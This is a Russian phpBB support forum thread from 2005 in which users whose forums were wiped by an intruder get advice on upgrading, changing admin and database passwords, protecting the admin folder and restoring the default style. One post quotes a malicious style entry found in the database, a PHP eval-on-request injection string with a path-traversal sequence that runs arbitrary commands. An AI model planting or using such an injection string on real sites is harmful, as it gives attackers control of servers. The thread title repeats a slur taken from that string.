Пропустить

Взлом форума - NIGGA

Темы по наиболее часто задаваемым вопросам по phpBB 2.0.x. Читать в первую очередь!

Взлом форума - NIGGA

Сообщение Барминовский » 06.04.2005 19:16

Здравствуйте! У меня такая проблема. Сегодня мой форум был 2 раза взломан. Я в расстерянности.
Пользователь некто P06uH30H после того, как зарегистрировался "убил" все форумы. Мой форум находится здесь http://studio-77.hut1.ru/phpBB2/
Вот, что он мне написал, после того, как я заново установил форум:http://studio-77.hut1.ru/phpBB2/viewtopic.php?t=2
Как мне защитить форум от взлома?
Аватара пользователя
Барминовский
phpBB 1.0.0
 
Сообщения: 2
Зарегистрирован: 06.04.2005 19:07
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.

Сообщение newest » 06.04.2005 19:53

версия форума?
когда вы его проапгрейдили?
а пароли поменяли?

newest
 

Сообщение Барминовский » 06.04.2005 20:44

newest писал(а):версия форума?
когда вы его проапгрейдили?

phpBB-2.0.13
апгрейд часов пять назад зделал.

newest писал(а):а пароли поменяли?

пароли - нет :?
Аватара пользователя
Барминовский
phpBB 1.0.0
 
Сообщения: 2
Зарегистрирован: 06.04.2005 19:07
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.

Сообщение newest » 06.04.2005 20:56

Барминовский писал(а):пароли - нет

ну поэтому он вас и ломает.. хоть 10 раз проапгрейдитесь.. пароли надо менять.. тогда он не сможет ничего сделать..

поменяйте пароли.. установите форум.. спите спокойно..

newest
 

Сообщение Егор Наклоняев » 06.04.2005 21:04

Барминовский
Ну и админку закройте с помощью .htaccess. Тема уже здесь обсуждалась. Поиск по ключевому слову htaccess
Учим матчасть:
http://phpbbguru.net/community/viewtopic.php?t=2061
Аватара пользователя
Егор Наклоняев
phpBB 2.0.12
 
Сообщения: 404
Зарегистрирован: 25.10.2004 3:27
Откуда: оттуда
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.

Сообщение Kevin » 07.04.2005 4:55

У меня тоже неделю назад взломали форум,
но у меня сначало сложилось впечатление,
что вскрыли админский пароль, потому как
просто грохнули все форумы и категории со
всеми сообщениями :(

Версия была 2.0.11

Покопав БД обнаружил новый шаблон(стиль) с заголовком:
aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp

Что случилось, как форум был взломан?

PS. Склоняюсь к мысле сменить движек форума...

Kevin
phpBB 1.0.0
 
Сообщения: 5
Зарегистрирован: 29.12.2004 17:01
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.

Сообщение crash » 07.04.2005 6:38

Kevin
просто предохраняться надо.. уже месяц всем кричат "обновите версию форума до последней (конкретно это было залатано в 2.0.13) ... но мы все крутые и думаем, а чего мой форум то ломать...


Kevin писал(а):PS. Склоняюсь к мысле сменить движек форума...

при вашем отношении к безопасности это ни к чему не приведет
Как правильно задавать вопросы
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса
Аватара пользователя
crash
Former team member
 
Сообщения: 6579
Зарегистрирован: 07.07.2004 17:12
Откуда: Бердск
Благодарил (а): 0 раз.
Поблагодарили: 16 раз.

Сообщение Vladson » 07.04.2005 6:39

Kevin писал(а):Покопав БД обнаружил новый шаблон(стиль) с заголовком

Это кто-то "сплойт" (который позволяет выполнять произвольные комманды на серавере) но воспользоваться им можно только имея админские прова, избавиться от этого просто, надо удалить этот стиль, затем обновить версию до последней (конкретно это было залатано в 2.0.13), затем сменить все админские пароли (желательно одновременно)

Добавлено спустя 59 секунд:

доп-инфо - http://www.securitylab.ru/53295.html
Серый цвет - светлый (светлее чёрного), но он и тёмный (темнее белого), он же промежуточный (между чёрным и белым). Теорию относительности никто не отменял. Истина в целом - понятие виртуально-ситуативное.
Аватара пользователя
Vladson
Former team member
 
Сообщения: 821
Зарегистрирован: 27.04.2004 6:07
Откуда: Estonia, Tallinn
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.

Сообщение avm » 07.04.2005 23:07

Барминовский, вы кстати не забыли сменить пароль доступа к БД? Он указывается в config.php, а то раньше у вас была ситуация - в первом форуме одна тема и в ней два сообщения (ваше и его), а счетчик сообщений на титульной странице показывал 0 (при этом судя по подписи внизу у вас стоял уже 2.0.13). Это говорит о том, что скорее всего у этого хацкера есть прямой доступ к вашей БД...
выделенный сервер по цене обычного хостинга - менее 150 рублей в месяц
Благодарности принимаются в Яндекс.Деньгах на счет 4100143316948
Аватара пользователя
avm
phpBB 2.0.18
 
Сообщения: 584
Зарегистрирован: 16.01.2005 11:40
Откуда: Москва
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.

Сообщение Егор Наклоняев » 07.04.2005 23:10

Барминовский
1. Перестать биться в истерике.
2. Если есть аська и АйПи начинать давить на психику. Учтите, взлом форума квалифицируется по статье 273 п.1 УК РФ (до 3х лет). Правда, 14 летние дети неподсудны по этой статье, но это не обязательно афишировать. Все эти юные кулхацкеры храбры, пока их не ткнешь носом аки кутёнка. Скорее всего, дитё даже не умеет пользоваться анонимными прокси.
3. Файл .htaccess создайтся в любом текстовом редакторе. Либо обратитесь к хостеру, чтобы закрыл каталог admin паролем. Это можно сделать в конфигурации сервера.
Аватара пользователя
Егор Наклоняев
phpBB 2.0.12
 
Сообщения: 404
Зарегистрирован: 25.10.2004 3:27
Откуда: оттуда
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.

Сообщение sPaG » 15.04.2005 13:33

Поломали меня...

а вернуть старые настроки что бы по дефалту был субсильвер стиль никак нельзя?

sPaG
 

Сообщение L@SS@RD » 15.04.2005 19:30

sPaG можно.
Если у вас есть доступ к phpMyAdmin'у на сервере.
Вам нужна таблица: phpbb_config
Нужно изменить 2 поля:
1. override_user_style
значение изменить на "1" (без кавычек)
2. default_style
заменить тоже на "1", так как сабСильвер по умолчанию первым стоит, если не так, то измените на другой.

L@SS@RD
 

после неудачной установки стиля

Сообщение andreysmorya » 17.04.2005 15:12

"Если у вас есть доступ к phpMyAdmin'у на сервере "
Поясните пожалуйста подробно - пошагово где "это" искать - править.
Последний раз редактировалось andreysmorya 05.01.2006 10:15, всего редактировалось 1 раз.

andreysmorya
phpBB 1.2.1
 
Сообщения: 24
Зарегистрирован: 09.03.2005 2:02
Откуда: Геленджик
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.

Сообщение L@SS@RD » 17.04.2005 16:07

andreysmorya, это приложение(набор скриптов) на вашем сервере, позволяющее управлять базами данных.
Если хостинг платный, то 99.9% что он должен быть установлен, смотрите в контрольной панели управления сайтом.
Если хостинг бесплатный, то вроятность присутствия пхпМайАдмина снижается.

Можно спросить у службы поддержки его местонахождение.

phpMyAdmin имеет интуитивно понятный интерфейс. Слева фрейм со списком имеющихся у вас баз данных, справа дополнительная информация, а при выборе БД, то её содержимое, т.е. таблицы.

Когда вы в левом фрейме выберите свою БД, ту, которую использует ваш форум (можно посмотреть в конфиге, если забыли), - справа появятся её таблицы.
Как я уже писал выше, вам необходимо выбрать таблицу phpbb_config
Открыть её на просмотр, напротив от таблицы есть кнопочки, выбирайте "Обзор".
Откроется содержмое данной таблицы.(учтите, содержимое находится на нескольких страницах) Далее ищете поля с названиями override_user_style и default_style. И тому и другому полю нужно присвоить значение "1".
Чтобы редактировать какое-либо поле, слева от него существует кнопочка "Правка".

Если что не ясно, пишите.

L@SS@RD
 

стиль

Сообщение andreysmorya » 17.04.2005 18:36

L@SS@RD, спасибо, хостинг платный, только как и везде оперативные ответы от них на стадии "приема оплаты" :) далее "не беспокойте нас по пустякам" попробую разобраться...
Последний раз редактировалось andreysmorya 05.01.2006 10:16, всего редактировалось 1 раз.

andreysmorya
phpBB 1.2.1
 
Сообщения: 24
Зарегистрирован: 09.03.2005 2:02
Откуда: Геленджик
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.

След.

Вернуться в FAQ (phpBB 2.0.x)

 

  • Похожие темы
    Ответы
    Просмотры
    Последнее сообщение

Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 0

Бессрочный конкурс phpBB-ориентированных материалов
FastVPS — надёжный и доступный хостинг для phpBB
Место для вашей рекламы